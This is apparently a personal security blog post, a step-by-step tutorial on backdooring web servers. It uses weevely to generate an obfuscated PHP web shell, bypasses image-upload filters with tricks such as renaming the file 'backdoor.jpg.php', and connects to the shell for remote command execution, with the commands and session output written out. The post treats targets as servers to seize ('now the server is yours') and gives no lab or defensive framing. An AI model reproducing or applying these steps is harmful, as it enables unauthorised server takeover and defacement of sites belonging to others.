How to backdoor and deface a web server using weevely

In the web almost 82% of servers are running on PHP. Its a simple open source server side scripting language. A website consist of PHP, HTML, CSS, Javascript mostly. Among these PHP directly interact with the server i.e. logical calculations and stuffs other languages are for user interface. PHP can also contact sql server for retrieving and writing data.

In computing backdoor is a method to access a system remotely without proper authentication. These backdoors can have access to the whole system and capable of executing system command. Here we are using weevely to generate and handle a PHP backdoor. weevely is a built in tool in kali linux which is capable of generating obfuscated php shell scripts and control it remotely. Most of the systems are being compromised via shell upload. Image upload or file upload feature in a web server can have many vulnerabilities. Saving the raw file upload in a server is a bad idea a hacker can root the server by uploading malware if he knows the path of the upload. Another vulnerability is image upload, through an image upload feature a user can upload any type of file to the server if its not filtered  properly. Some webmasters implement javascript to filter the upload but, a hacker can upload his shell by disabling java on the browser. Server side filters are also being used in such a way that it only check for string “.jpg” or “.png” in the file name. This can be exploited by renaming the shell like this “shell.jpg.php”. Once you find a upload vulnerability you can use weevely.


Weevely requires modules like socks handler so, we need to install all the required libraries.
# sudo apt-get install python-pip libyaml-dev
# sudo pip install prettytable Mako pyaml dateutils pysocks –upgrade

Generating backdoor

Lets generate a password protected backdoor so that others cannot get unauthorized access to our shell. Follow the command

# weevely generate password /root/Desktop/backdoor.php

A php file will be generated on the desktop with the password “password” . We have to upload this file into target web server. For that you have to find some upload vulnerability or need to get FTP access. Image upload features in the websites is a great chance of getting your shell in to the server. Rename the backdoor into “backdoor.jpg.php” or “backdoor.PHP” to bypass verification sometimes disabling JavaScript on browsers will help. Some how upload the file in to the target server but, make sure you know the directory in which all these uploads goes into. Mostly images will be on “/images” or “/photos” directories.


Executing the payload

Moving on to the handler section, You just need to know the directory of script in the server. say “/images” directory. follow the commands.
# weevely “” password
This will give you a ssh like interface where you can control the server remotely

root@khromozome:~# weevely “http://localhost/backdoor.php” password[+] weevely 3.2.0

[+] Target: www-data@khromozome:/var/www/html
[+] Session: /root/.weevely/sessions/localhost/backdoor_0.session
[+] Shell: System shell

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.


Tadaaaa… now the server is yours use help command for more info

weevely> help

You can execute system shell commands networking commans, file system commands.

susmith HCK

susmith HCK

I’m a computer enthusiast basically and i love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and i would like to explore security vulnerabilities and latest tech news and wanna share with you. If you like all these stuffs add me on Facebook and Google plus.

Leave a Reply

Your email address will not be published. Required fields are marked *